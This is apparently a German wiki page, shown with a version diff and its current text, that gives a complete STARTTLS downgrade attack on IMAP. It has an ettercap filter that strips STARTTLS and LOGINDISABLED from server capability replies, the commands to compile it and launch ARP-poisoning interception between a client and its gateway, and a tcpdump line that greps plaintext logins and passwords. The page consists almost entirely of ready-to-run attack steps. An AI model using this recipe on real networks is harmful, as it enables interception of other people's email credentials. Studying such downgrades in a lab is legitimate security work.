STARTTLS DOWNGRADE STARTTLS Entfernen: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 8: | Zeile 8: | ||
<pre> | <pre> | ||
if (ip.proto == TCP && tcp.src == 143) { | if (ip.proto == TCP && tcp.src == 143) { | ||
| − | if (search(DATA.data, "CAPABILITY")) { | + | if (search(DATA.data, "CAPABILITY")) { |
| − | if (search(DATA.data, "STARTTLS")) { replace("STARTTLS", " "); } | + | if (search(DATA.data, "STARTTLS")) { replace("STARTTLS", " "); } |
| − | if (search(DATA.data, "LOGINDISABLED")) { replace("LOGINDISABLED", " "); } | + | if (search(DATA.data, "LOGINDISABLED")) { replace("LOGINDISABLED", " "); } |
| − | } | + | } |
} | } | ||
| + | |||
</pre> | </pre> | ||
Aktuelle Version vom 10. August 2025, 20:27 Uhr
Benötigte Paket
- apt-get install ettercap-graphical
- CLIENT=10.0.10.55
- GATEWAY=10.0.10.1
- INTERFACE=eth0
Filterdatei erstellen
- vi imapstrip.ef
if (ip.proto == TCP && tcp.src == 143) {
if (search(DATA.data, "CAPABILITY")) {
if (search(DATA.data, "STARTTLS")) { replace("STARTTLS", " "); }
if (search(DATA.data, "LOGINDISABLED")) { replace("LOGINDISABLED", " "); }
}
}
Filter kompilieren
- etterfilter imapstrip.ef -o imapstrip.efec
MITM starten (ARP-Proxy mit Filter)
- ettercap -Tq -i $INTERFACE -M arp "/$CLIENT//" "/$GATEWAY//" -F imapstrip.efec
Beweis (Klartext sichtbar)
- tcpdump -ni $INTERFACE -A -s0 host $CLIENT and port 143 | egrep -i 'capability|starttls|login|pass'